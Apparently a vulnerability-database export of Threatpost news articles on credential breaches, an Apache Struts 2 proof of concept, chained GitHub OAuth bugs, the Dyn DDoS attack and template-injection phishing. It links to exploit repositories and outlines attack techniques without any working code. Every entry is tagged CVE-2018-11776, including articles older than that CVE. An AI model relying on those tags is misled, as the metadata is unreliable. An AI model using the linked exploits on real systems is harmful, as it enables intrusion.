from GitHub was not returned in time for publication~~ Github declined to comment beyond what is in its advisory.\n\nIn recent weeks, a number of massive online services including Twitter, VerticalScope, LinkedIn, Tumblr, VK.com and others have been informed that login credentials are for sale in bulk on the black market.\n\nAggregator site LeakedSource has been selling access to its database of breached credentials and more than 700 million credentials have been shared with the site.\n\n\u201cOur intentions are to bring data breaches to light no matter how old, inform consumers about what data is out there, inform consumers to use unique passwords and through our business API directly help companies determine if their users are at risk for account hijacking,\u201d LeakedSource told Threatpost.\n\n[VerticalScope](<http://www.verticalscope.com/about-us/security-update.html>), whose technology powers a number of popular online forums, is the most recent victim to come to light. More than 40 million credentials are believe to be implicated, stolen from sites running outdate vBulletin software that fails to implement HTTPS.\n\n\u201cWe believe that any potential breach is limited to usernames, userids, email addresses, ip addresses and encrypted passwords of our community users,\u201d VerticalScope said in its advisory.\n\nThe VerticalScope data was shared with LeakedSource, which analyzed it and said most of the passwords were salted using the outdated MD5 algorithm and easily crackable. LeakedSource published a top 10 list of the most common passwords and an unusual number of jibberish, complex passwords were included (18atcskd2w was used more on more than 91,000 accounts) indicating that they were likely generated by a bot and used to access the various forums.\n\nIn addition to VerticalScope, LeakedSource has analyzed tens of millions of credentials belonging to Twitter, iMesh and users of other large services whose credentials were stolen at some point.\n\nExperts, meanwhile, continue to caution against [password reuse](<https://threatpost.com/no-simple-fix-for-password-reuse/118536/>). As these breaches show, using the same password to access multiple sites is becoming fodder for attackers compromising one site to use that same access at other locations on the Internet.\n\n\u201cWe know that attackers will go for the weakest link and that is any user who reuses their passwords. It\u2019s a major problem,\u201d said Christopher Hadnagy, chief human hacker at security firm Social-Engineer.\n", "cvss3": {}, "published": "2016-06-17T11:01:55", "type": "threatpost", "title": "Breached Credentials Used to Access Github Repositories", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:36", "id": "THREATPOST:375A1BFC29F5B279C4D5E461D79CE4AA", "href": "https://threatpost.com/breached-credentials-used-to-access-github-repositories/118746/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-30T05:51:35", "description": "Proof-of-concept code found on the GitHub repository could allow attackers to easily take advantage of a recently identified vulnerability in the Apache Struts 2 framework. The vulnerability ([CVE-2018-11776](<https://access.redhat.com/security/cve/cve-2018-11776>)), [identified earlier this week](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>), could allow an adversary to execute remote code on targeted systems.\n\nOn Friday, proof-of-concept code was [released](<https://github.com/jas502n/St2-057>) on GitHub along with a [Python script](<https://github.com/pr4jwal/quick-scripts/blob/master/s2-057.py>) that allows for easy exploitation, according to Allan Liska, senior security architect with Recorded Future.\n\n\u201c[We have] also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability,\u201d he [wrote in a post](<https://www.recordedfuture.com/apache-struts-vulnerability-github/>).\n\nThe bug, which impacts Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16, is tied to an improper validation of input data. The Apache Software Foundation [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) the vulnerability for all supported versions of Struts 2. Users of Struts 2.3 are advised to upgrade to 2.3.35 and users of Struts 2.5 need to upgrade to 2.5.17.\n\nLiska said the Apache Struts 2 vulnerability is potentially even more damaging than a similar [2017 Apache Struts bug used to exploit Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\n\u201cUnlike that vulnerability, this one does not require any plug-ins to be present in order to exploit it, a simple well-crafted URL is enough to give an attacker access to a victim\u2019s Apache Struts installation and there is already exploit code on Github and underground forums are talking about how to exploit it. The worst part for many large organizations is that they may not even know they are vulnerable because Struts underpins a number of different systems including Oracle and Palo Alto,\u201d Liska said.\n\nThe fact that a patch is available to fix the vulnerability should give cold comfort to companies potentially impacted by the flaw.\n\n\u201cThe Equifax breach happened not because the vulnerability wasn\u2019t fixed, but because Equifax hadn\u2019t yet updated Struts to the latest version. If this is a true working PoC, then any company who hasn\u2019t had the time to update their software, will now be at even greater risk,\u201d said Oege de Moor, chief executive officer at Semmle.\n\nDe Moor said Semmle is not confirming whether the reported PoC is functional.\n\n\u201cIf it is [functioning], attackers now have a quicker way into the enterprise,\u201d de Moor wrote in a prepared statement Friday. \u201cThere is always a time lag between the announcement of a patch and a company updating its software. There are many reasons why companies can\u2019t update software like Struts immediately, as it is used for many business-critical operations. We aim to give companies a chance to stay safe by working with Apache Struts to make a coordinated disclosure.\u201d\n", "cvss3": {}, "published": "2018-08-24T22:07:17", "type": "threatpost", "title": "PoC Code Surfaces to Exploit Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T22:07:17", "id": "THREATPOST:2F30C320035805DB537579B86877517E", "href": "https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:59:23", "description": "A Russian security researcher was able to take five low severity OAuth bugs in the coding site Github and string them together to create what he calls a \u201csimple but high severity exploit\u201d that gave him unfettered access to users\u2019 private repositories.\n\nBangkok-based researcher Egor Homakov \u2013 inspired to poke around the site after learning about its [new bug bounty program last month](<http://threatpost.com/github-launches-bug-bounty-program/103974>) \u2013 discussed the bugs in a blog entry [on his site](<http://homakov.blogspot.com/2014/02/how-i-hacked-github-again.html?m=1>) on Friday.\n\nGithub went on to fix the vulnerabilities \u201cin a timely fashion\u201d according to Homakov, who said he received a $4,000 reward, the highest Github has rewarded in the bounty program\u2019s short time, for his work.\n\nThe main problem lies in the site\u2019s Gist OAuth functionality. [Gists](<https://gist.github.com/>) are Pastebin-like repositories on Github that allow coders to share bits and pieces of their work with their contemporaries, and OAuth is an authentication protocol that can allow different entities, be it a web app or a mobile app, varying degrees of access to your account.\n\nThe first vulnerability in Github Homakov noticed was that he could bypass its [redirect_uri](<https://developer.github.com/v3/oauth/#redirect-urls>) validation by imputing a /../ path traversal. A path traversal attack allows access files and directories stored outside the web root folder to be accessed by manipulating the URL. In this case when the browser is redirected, Homakov found that he can control the HTTP parameter and trick it into not fully parsing the URL, letting him redirect to any Gist page he wants.\n\nIn fact Homakov found that whatever the client sent to get an authorization token, the provider would respond with a valid access_token, a vulnerability that could be used to compromise the log-in functionality on any site that uses it.\n\nThis \u2013 the second bug \u2013 could make it easy for an attacker to hijack the authorization code used for the redirect_uri and simply apply the leaked code on real client\u2019s callback to log in under the victim\u2019s account.\n\nHomakov discovered he could leverage both bugs to trick a user into following a link to get Github to leak a code sending request to him. Using something he\u2019s nicknamed an [Evolution of Open Redirect vulnerability](<http://homakov.blogspot.com/2014/01/evolution-of-open-redirect-vulnerability.html>) the code sending request is sent to an image request which Homakov can then use to then log into the victim\u2019s account and secure access to private gists.\n\nGists are static pages and can even allow users to embed their own images, or at least image code. In this situation there\u2019s a certain way the code can point to a suspicious URL and acquire the victim\u2019s code.\n\nOnce in, Homakov found that the client reveals the victim\u2019s actual OAuth access_token to the user agent, something he then was able to take advantage of and use to perform API calls on behalf of the victim.\n\nSince Gist falls under the Github umbrella, Homakov found the client approves any scope it\u2019s asked automatically. That includes allowing it to carry out specially crafted URLs that can leak code, giving him access to private GitHub repositories and Gists, \u201call in stealth-mode,\u201d because the github_token belongs to the Gist client. From here Homakov has the control of the affected Github user and their Gist account.\n\nHomakov is no stranger to rooting out Github bugs; he blogged about a bug involving the way the site pushes [public keys](<http://homakov.blogspot.com/2012/03/how-to.html>) in March 2012 and a problem with the way the site [handles cookies](<http://homakov.blogspot.com/2013/03/hacking-github-with-webkit.html>) last March.\n\nGithub kicked off its bug bounty program just over a week ago by promising to award anywhere from $100 to $5,000 to researchers who discover vulnerabilities in the site or other applications like its API or Gist. As Homakov\u2019s vulnerability involved both Github and Gist and fetched $4,000, it was clearly of concern to the site, with the way the vulnerabilities \u201c[fit so nicely together](<https://twitter.com/homakov/status/431685133570031617>),\u201d impressing Github.\n", "cvss3": {}, "published": "2014-02-11T10:53:58", "type": "threatpost", "title": "Five OAuth Bugs Lead to Github Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-02-13T22:01:16", "id": "THREATPOST:1F0994F898084346360FB7C6EFEC201C", "href": "https://threatpost.com/five-oauth-bugs-lead-to-github-hack/104178/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:34", "description": "**Update **DNS provider Dyn has confirmed two massive distributed denial of service attacks against its servers Friday impacting many of its customers including Twitter, Spotify and GitHub. The attacks came in two waves, one early Friday morning and a second just a few hours later.\n\n\u201cThis attack is mainly impacting U.S. East and is impacting Managed DNS customers in this region. Our engineers are continuing to work on mitigating this issue,\u201d according to a [statement by the company to customers](<https://www.dynstatus.com/>).\n\nAs of 5:30 p.m. EDT Dyn was still reporting it was investigating and mitigating several DDoS attacks against its domain name servers.\n\nIt\u2019s unclear how many sites have been impacted. For hours Friday morning many popular sites appeared to be experiencing outages or extremely sluggish performance including Twitter, Etsy, Github, SoundCloud, Spotify, Heroku, PagerDuty and Shopify. Dyn representatives would not confirm if each one of these outages was tied to the DDoS attack.\n\nBoth the Department of Homeland Security and the Federal Bureau of Investigation said they were monitoring the attacks. Gillian Christensen, acting deputy press secretary for DHS said in a statement: \u201cDHS and FBI are aware and are investigating all potential causes.\u201d\n\nManchester, New Hampshire-based Dyn said it first began monitoring the DDoS attack at 7:10 a.m. EDT Friday. The company said in a statement to customers:\n\n> \u201cStarting at 11:10 UTC on October 21th-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.\u201d\n\nDyn said at 9:36 a.m. EDT, its services were restored and many of its affected customers, including Twitter, were back online. However, at 11:52 a.m. (EDT) Dyn updated its network status reporting an additional attack impacting its managed DNS infrastructure. Then 40 minutes later Dyn added the attacks had spread to its \u201cmanaged DNS advanced services with possible delays in monitoring.\u201d\n\nIt\u2019s unclear, at this time, the source of the DDoS attack, Dyn said.\n\nDale Drew, chief security officer for telecommunications firm Level 3 Communications said he had been monitoring the attack and the likely source were overseas hackers targeting U.S. cyber infrastructure. He added, [via a video statement posted to Periscope](<https://www.periscope.tv/w/1lPJqYjVMlZJb>), \u201cWe are seeing attacks coming from an Internet of Things botnet we have identified as Marai.\u201d\n\nSecurity firm Flashpoint also identified Marai as the likely culprit in the attack.\n\nThe Mirai malware continues to recruit vulnerable IoT devices into botnets [at a record pace](<https://threatpost.com/mirai-bots-more-than-double-since-source-code-release/121368/>), one that\u2019s only gone up since the source code for Mirai was made [public two weeks ago](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>), according to Level 3.\n\nCraig Young, principle security researcher at Tripwire said the attack has telltale signs of an IoT-based DDoS attack similar to ones experienced by [Krebs on Security](<https://threatpost.com/iot-botnets-are-the-new-normal-of-ddos-attacks/121093/>) in September. In those attacks, hackers also used Mirai malware to compromise IoT devices to launch DDoS attacks.\n\n\u201cWe are seeing an increase in the number of high-intensity attacks that leverage compromised consumer DVRs and cameras. Without being able to analyze the source of Dyn\u2019s traffic it\u2019s impossible to know for sure. But what we are already seeing today, in terms IoT-based attacks, is the tip of the iceberg,\u201d Young said.\n\nRequests to Dyn for information on the source of the attacks have not been returned.\n\nYoung said that security experts have seen an increase in DDoS extortion attempts. However, he points out, many have been hoaxes and when companies didn\u2019t pay up nothing happened.\n\nForeScout CEO, Michael DeCesare said that attacks, such as the ones carried out Friday, are exasperated by the lack of security in IoT devices.\n\n\u201cThese attackers can now recruit an army of IoT devices to launch a wide scale DDoS attack due to the volume of these devices and their ease of infiltration,\u201d DeCesare said in a prepared statement regarding Friday\u2019s attacks.\n\n\u201cThe question corporations should be asking themselves is whether or not their devices are being exploited as part of these attacks. The solution starts with visibility \u2013 you cannot secure what you cannot see,\u201d he said.\n\n[![Level3 live outage map on Friday 9:50 AM \$ET\$](https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232928/Threatpost_Level3_outage_map.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232928/Threatpost_Level3_outage_map.jpg>)\n\nLevel3 live outage map on Friday 9:50 AM (EDT)\n\n[![screen-shot-2016-10-21-at-5-18-29-pm](https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232859/Screen-Shot-2016-10-21-at-5.18.29-PM-1024x605.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232859/Screen-Shot-2016-10-21-at-5.18.29-PM.png>)\n\nLevel3 live outage map on Friday 5:20 PM (EDT)\n\n_This article was updated Oct. 21 at 5:30 p.m. with new information from the Department of Homeland Security, new information tying the attacks to Mirai malware and quotes from both Level 3 Communications and ForeScout. \n_\n", "cvss3": {}, "published": "2016-10-21T10:01:14", "type": "threatpost", "title": "DYN Confirms DDoS Attack Knocking Out Twitter, Spotify Other Major Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-10-21T21:37:20", "id": "THREATPOST:0FC293825070B81036932BDB41D793B5", "href": "https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:10", "description": "Mike Mimoso and Chris Brook discuss the news of the week, including a password issue at Github, the xDedic marketplace, another Flash zero day, and how the poorly the FBI is doing with facial recognition software.\n\nDownload: [Threatpost_News_Wrap_June_17_2016.mp3](<http://traffic.libsyn.com/digitalunderground/Threatpost_News_Wrap_June_17_2016.mp3>)\n\nMusic by Chris Gonsalves\n\n[![itunessub](https://media.threatpost.com/wp-content/uploads/sites/103/2014/11/07011443/itunessub.jpg)](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2016-06-17T11:15:12", "type": "threatpost", "title": "On xDedic, a Flash Zero Day, Facial Recognition, and More", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:31", "id": "THREATPOST:962241D6EFDC7F82640BA9171D82D0B7", "href": "https://threatpost.com/threatpost-news-wrap-june-17-2016/118745/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:25", "description": "Days after news broke last week that advanced, persistent threat actors penetrated nuclear facilities, researchers are explaining techniques used by adversaries to gain toeholds in similar targets in energy. Cisco Talos reported Friday that email-based attacks, leveraging template injection techniques, targeting nuclear facilities and others have been ongoing since May.\n\n\u201cTalos has observed attackers targeting critical infrastructure and energy companies around the world, primarily in Europe and the United States. These attacks target both the critical infrastructure providers, and the vendors those providers used to deliver critical services,\u201d [researchers wrote on Friday](<http://blog.talosintelligence.com/2017/07/template-injection.html#more>).\n\nAdversaries are leveraging classic Word document-based phishing attacks, they said. However, the Word document attachments used in the phishing campaigns do not contain malicious VBA macros or embedded scripting. Instead, attachments attempt to download a malicious template file over a Server Message Block (SMB) connection so that the user\u2019s credentials can be harvested, researchers said.\n\nCisco Talos did not claim this specific attack was used against Wolf Creek Nuclear Operating Corporation or in connection with any specific attack cited in a joint report issued by the Department of Homeland Security and the Federal Bureau of Investigation last week. Neither did researchers claim attacks had ever led to a hacker breaching or disrupting the core systems controlling operations at an energy plant.\n\n\u201cOne objective of this most recent attack appears to be to harvest credentials of users who work within critical infrastructure and manufacturing industries,\u201d Talos wrote.\n\nTargeted phishing attacks included DOCX type documents delivered as attachments under the guise of being an environmental report or a resume. While no malicious macros or scripting is embedded in the document, when a user opens it, a request is made via the SMB protocol for a template, as such \u201cContacting:\\\\\\ . . . \\Template.dotm.\u201d\n\n\u201cThe document was trying to pull down a template file from a particular IP,\u201d they noted. That connection was not via TCP 80 (often used for C2 communications), rather the SMB request was via TCP 445, a traditional Microsoft networking port.\n\nWithin the sandboxed VM \u201ca WebDAV connection was attempted over a SMB session when requesting the template.\u201d\n\nWebDAV is a Web-based Distributed Authoring and Versioning extension to the HTTP protocol that allows users to collaboratively edit and manage files on a remote server, according to [WebDAV Working Group](<http://www.webdav.org/>).\n\nUsing the WebDAV connection, the DOCX file requests a specific Relationship ID that is present in word/_rels/settings.xml.rels, or the XML instructions. According to researchers, the Relationship ID is identical to a phishing tool named Phishery, which uses the exact same ID in its template injection.\n\nPhishery is known as a credential harvester with a Word document template URL injector. According the [GitHub tool description](<https://github.com/ryhanson/phishery>), \u201cPhishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication.\u201d Once the target opens the Word document attachment sent in the phishing email, the template request reaches out to a Phishery server that triggers a dialogue box on the victim\u2019s computer requesting a Windows username and password.\n\nTalos researchers said Phishery was not used in the attacks it observed. It theorizes attacks may have used modified Phishery code or used the same Relationship ID to thwart analysis.\n\nIn the sample Talos examined, unlike with Phishery that prompted users for credentials, instead a template file is requested from a third-party server with no Basic Authentication prompt for credentials. \u201cSuch a prompt was not needed nor seen for samples requesting the template over SMB,\u201d they wrote.\n\nOnce the target opens the Word document a template request is made to a third-party server that initiates the download of a potentially rogue template. \u201cThe attachment instead tries to download a template file over an SMB connection so that the user\u2019s credentials can be silently harvested. In addition, this template file could also potentially be used to download other malicious payloads to the victim\u2019s computer,\u201d researchers said.\n\nTalos explains that the attacker\u2019s SMB server was down when it analyzed samples, making it impossible to determine the payloads (if any) that could have been dropped by the template being downloaded. \u201cForcing SMB requests to an external server has been a known security vulnerability for many years. Without further information it is impossible to conclude what the true scope of this attack was or what malicious payloads could have been involved.\u201d\n\nAccording to a _[New York Times](<https://www.nytimes.com/2017/07/06/technology/nuclear-plant-hack-report.html>)_ report of attacks against Wolf Creek Nuclear Operating Corporation included phishing lures with highly targeted email messages containing fake resumes for control engineering jobs.\n\nLate last month, the U.S. government warned critical infrastructure companies of hacking campaigns against nuclear and energy sector. \u201cHistorically, cyber actors have strategically targeted the energy sector with various goals ranging from cyber espionage to the ability to disrupt energy systems in the event of a hostile conflict,\u201d the report said.\n", "cvss3": {}, "published": "2017-07-10T14:34:03", "type": "threatpost", "title": "Energy, Nuclear Targeted with Template Injection Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-07-10T18:34:03", "id": "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "href": "https://threatpost.com/energy-nuclear-targeted-with-template-injection-attacks/126727/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:06", "description": "Amazon Web Services is actively searching a number of sources, including code repositories and application stores, looking for exposed credentials that could put users\u2019 accounts and services at risk.\n\nA week ago, a security consultant in Australia said that as many as 10,000 secret Amazon Web Services keys could be found on Github through a simple search. And yesterday, a software developer reported receiving a notice from Amazon that his credentials were discovered on Google Play in an Android application he had built.\n\nRaj Bala printed a [copy of the notice](<http://blog.rajbala.com/post/81038397871/amazon-is-downloading-apps-from-google-play-and>) he received from Amazon pointing out that the app was not built in line with Amazon\u2019s recommended best practices because he had embedded his AWS Key ID (AKID) and AWS Secret Key in the app.\n\n\u201cThis exposure of your AWS credentials within a publicly available Android application could lead to unauthorized use of AWS services, associated excessive charges for your AWS account, and potentially unauthorized access to your data or the data of your application\u2019s users,\u201d Amazon told Baj.\n\nAmazon advises users who have inadvertently exposed their credentials to invalidate them and never distribute long-term AWS keys with an app. Instead, Amazon recommends requesting temporary security credentials.\n\nRich Mogull, founder of consultancy Securosis, said this is a big deal.\n\n\u201cAmazon is being proactive and scanning common sources of account credentials, and then notifying customers,\u201d Mogull said. \u201cThey don\u2019t have to do this, especially since it potentially reduces their income.\u201d\n\nMogull knows of what he speaks. Not long ago, he received a similar notice from Amazon regarding his AWS account, only his warning was a bit more dire\u2014his credentials had been exposed on Gitbub and someone had fired up unauthorized EC2 instances in his account.\n\nMogull wrote an [extensive description of the incident](<https://securosis.com/blog/my-500-cloud-security-screwup>) on the Securosis blog explaining how he was building a proof-of-concept for a conference presentation, storing it on Github, and was done in because a test file he was using against blocks of code contained his Access Key and Secret Key in a comment line.\n\nTurns out someone was using the additional 10 EC2 instances to do some Bitcoin mining and the incident cost Mogull $500 in accumulated charges.\n\nAmazon told an Australian publication that it will continue its efforts to seek out these exposed credentials on third-party sites such as Google Play and Github.\n\n\u201cTo help protect our customers, we operate continuous fraud monitoring processes and alert customers if we find unusual activity,\u201d _[iTnews](<http://www.itnews.com.au/News/381432,aws-admits-scanning-android-app-in-secret-key-hunt.aspx>) _quoted Amazon.\n\nSaid Mogull: \u201cIt isn\u2019t often we see a service provider protecting their customers from error by extending security beyond the provider\u2019s service itself. Very cool.\u201d\n", "cvss3": {}, "published": "2014-04-02T15:01:53", "type": "threatpost", "title": "Amazon Web Services Combing Third Parties for Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-04-04T19:14:11", "id": "THREATPOST:3DB647F38E79C8BDF5846F520D041C7C", "href": "https://threatpost.com/amazon-web-services-combing-third-parties-for-exposed-credentials/105217/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:19", "description": "The amount of insecure software tied to reused third-party libraries and lingering in applications long after patches have been deployed is staggering. It\u2019s a habitual problem perpetuated by developers failing to vet third-party code for vulnerabilities, and some repositories taking a hands-off approach with the code they host.\n\nThis scenario allows attackers to target one overlooked component flaw used in millions of applications instead of focusing on a single application security vulnerability. The real-world consequences have been demonstrated in the past few years with the [Heartbleed](<https://threatpost.com/openssl-fixes-tls-vulnerability/105300/>) vulnerability in OpenSSL, [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) in GNU Bash, and a deserialization vulnerability exploited in a recent high-profile attack against the [San Francisco Municipal Transportation Agency](<https://threatpost.com/hackers-make-new-claim-in-san-francisco-transit-ransomware-attack/122138/>). These are three instances where developers reuse libraries and frameworks that contain unpatched flaws in production applications.\n\nSecurity researchers at Veracode estimate that 97 percent of Java applications it tested included at least one component with at least one known software vulnerability. \u201cThe problem isn\u2019t limited to Java and isn\u2019t just tied to obscure projects,\u201d said Tim Jarrett senior director of security, Veracode. \u201cPick your programming language.\u201d Gartner, meanwhile, estimates that by 2020, [99 percent of vulnerabilities](<http://www.gartner.com/smarterwithgartner/top-10-security-predictions-2016/>) exploited will be ones known by security and IT professionals for at least one year.\n\n**Code Reuse Saves Time, Invites Bugs**\n\nAccording to security experts, the problem is two-fold. On one hand, developers use reliable code that at a later date is found to have a vulnerability. Second, insecure code is used by a developer who doesn\u2019t exercise due diligence on the software libraries used in their project.\n\n\u201cThey\u2019ve heard the warnings and know the dangers, but for many developers open source and third-party components can be a double-edge sword \u2013 saving time but opening the door to bugs,\u201d said Derek Weeks, vice president and DevOps advocate at Sonatype.\n\n[![sonatype](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232110/sonatype-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232110/sonatype.png>)In an analysis of 25,000 applications, Sonatype found that seven percent of components had at least one security defect tied to the use of an insecure software component.\n\nRepositories GitHub, Bitbucket, Python Package Index and NuGet Gallery are essential tools helping developers find pre-existing code that adds functionality for their software projects without having to reinvent the wheel. Java application developers, for example, rely on pre-existing frameworks to handle encryption, visual elements and libraries for handling data.\n\n\u201cSoftware is no longer written from scratch,\u201d Weeks said. \u201cNo matter how new and unique the application, 80 percent of the code used in a software application relies on third-party libraries or components.\u201d\n\nHe said enterprises are more reliant on the software supply chain than ever before. But he says many of the go-to open-source repositories that make up that supply chain are not vetted libraries of reliable code. Rather, they are warehouses with a varying percentage of outdated projects with security issues.\n\nAccording to an analysis of Sonatype\u2019s own Central Repository in 2015, developers had made 31 billion download requests of open source and third-party software components, compared to 17 billion requests the year before. And when Sonatype analyzed its own code library, it found 6.1 percent of code downloaded from its Central Repository had a known security defect.\n\nWeeks says Sonatype\u2019s is doing better than other repositories that offer no tools, no guidance and no red flags to prevent developers from using frameworks with faulty code. \u201cThere is no Good Housekeeping Seal of Approval for third-party code.\u201d\n\n\u201cFaulty code can easily spawn more problems down the road for developers,\u201d said Stephen Breen, a principal consultant at NTT Com Security. \u201cEven when development teams have the best intentions, it\u2019s easy for developers working under tight deadlines to not properly vet the third-party code used in their software.\u201d\n\nBreen said when insecure code is unknowingly used to build a component within a software program, problems snowball when that component is used inside other larger components. One example of vulnerable third-party code reused repeatedly is a deserialization flaw in Apache Commons Collections (commons-collections-3.2.1.jar) \u2013 first reported in 2015 and patched in November of the same year.\n\n[![threatpost_veracode_top_java_vulns](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232053/Threatpost_Veracode_Top_Java_vulns-1024x656.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232053/Threatpost_Veracode_Top_Java_vulns.png>)\n\nSource: Veracode\n\nJarrett found there are still 1,300 instances of the old vulnerable version of the Commons Collections lurking inside Java applications using Spring and Hibernate libraries and hosted across multiple open source code repositories.\n\n\u201cThe developer knows they are picking Spring or Hibernate for their development project. They don\u2019t take it to the next level and realize they are also getting Common Collections,\u201d Jarrett said. \u201cThat Common Collections library is then used by thousands more projects.\u201d\n\n[![apache](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232108/apache-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232108/apache.png>)According to Veracode, Apache Commons Collections is the sixth-most common component used in Java applications. It found that the unpatched versions of the software was in 25 percent of 300,000 Java applications scanned. Even more challenging for developers is updating those applications that are using the vulnerable version of libraries and frameworks since flaws were patched.\n\n\u201cThink of it like a faulty airbag. Carmakers used those faulty airbags in millions of vehicles. Now it\u2019s the carmaker on the hook to fix the problem, not the airbag maker,\u201d Jarrett said.\n\n**Leaky Apps, Bad Crypto, Injection Flaws Galore**\n\nVeracode said the Apache Common Collection example is the tip of the iceberg. When Veracode examined vulnerabilities tied to insecure code it found application information leakage, where user or application data can be leveraged by an attacker, is the most prevalent type of vulnerability, accounting for 72 percent of third-party code flaws. Second are cryptographic issues representing 65 percent of vulnerabilities. That was followed by Carriage Return Line Feed (CRLF) injection flaws and cross site scripting bugs.\n\n[![threatpost_veracode_top_vuln_cats](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232057/Threatpost_Veracode_Top_vuln_cats-1024x400.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232057/Threatpost_Veracode_Top_vuln_cats.png>)\n\nSource: Veracode\n\nCompounding the problem is an increased dependency on open-source components used in a wide variety of software products. The federal government is typical. It has an open-source-first policy as do many private companies. Relying on third-party libraries shortens development time and can improve the safety and quality of their software projects, Weeks said.\n\n\u201cNot only does code reuse save time but it also allows developers to be more innovative as they focus on creating new functionality and not writing encryption libraries from scratch,\u201d Weeks said. Done correctly, code reuse is a developer\u2019s godsend, he said.\n\nFor those reasons, security experts say it\u2019s time for the industry to stop and consider where code originates. Sonatype, which markets and sells code verification services, promotes the idea of documenting software\u2019s supply chain with what it calls a \u201csoftware bill of materials.\u201d That way developers can better scrutinize open-source frameworks before and after they are used; making it easier to update those applications that are using vulnerable old versions of libraries.\n\nSonatype said it found one in 16 components it analyzed had a vulnerability that was previously documented, verified and with additional information available on the Internet. \u201cI can\u2019t imagine any other industry where it\u2019s okay that one in 16 parts have known defects.\u201d\n\nThe problem is that among developers there is a mix of denial and ignorance at play. \u201cDevelopers choose component parts, not security,\u201d Weeks said. It should be the other way around.\n\n\u201cIf we are aware of malicious or bad libraries or code, of course we want to warn our users,\u201d said Logan Abbott, president of SourceForge, a software and code repository. \u201cWe scan binaries for vulnerabilities, but we don\u2019t police any of the code we host.\u201d\n\n**Repositories Say: \u2018We\u2019re Just the Host\u2019**\n\nRepositories contacted by Threatpost say their platforms are a resource for developers akin to cloud storage services that allow people to store and share content publicly or privately. They don\u2019t tell users what they can and cannot host with their service.\n\nThey say rooting out bugs in software should be on shoulders of developers \u2013 not repositories. Writing good vulnerability-free code starts at getting good code from healthy repositories with engaged users.\n\n[![bitbucket](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232105/bitbucket-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232105/bitbucket.png>)\u201cBitbucket is to a developer like Home Depot is to a carpenter,\u201d said Rahul Chhabria, product manager for Atlassian Bitbucket. \u201cWe\u2019ve built a hosting service with a variety of tools to help developers execute on their vision.\u201d\n\nChhabria said Bitbucket offers a range of tools to help sniff out bad or insecure components such as the third-party tool SourceClear for scanning dependency chains. It also offers Bitbucket that it says allows for team development of software projects and simplifies peer review. Another features, Bitbucket Pipelines, is also designed to help developers ship high quality code.\n\nGitHub is one of the largest repositories; it hosts 49 million public and private projects for its 18 million users. It does not scan or red flag insecure code hosted on its platform, according to Shawn Davenport, VP of security at GitHub. Instead developers can use third party-tools such as Gemnasium, Brakeman and Code Climate for static and dependency analysis.\n\n[![github](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232101/github-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232101/github.png>)\u201cThere is a lot of hidden risk out there in projects,\u201d Davenport said. \u201cWe do our best to make sure our developers know what tools are available to them to vet their own code.\u201d He estimates a minority GitHub developers take advantage of software scanning and auditing tools. \u201cUnfortunately security isn\u2019t a developers first priority.\u201d\n\nOther repositories told Threatpost they intentionally take a hands-off approach and say expecting them to police their own software isn\u2019t feasible, not part of their mission and nothing they plan to do. They point out, flawed or not, developers want access to all code \u2013 even older components.\n\n\u201cAn implementation of a library in one framework might not be a security risk at all,\u201d Breen said. He points out developers often temporarily revert to those old libraries as stopgaps should an updated version break a project.\n\n**Automated Scanning to the Rescue?**\n\nOne attempt at 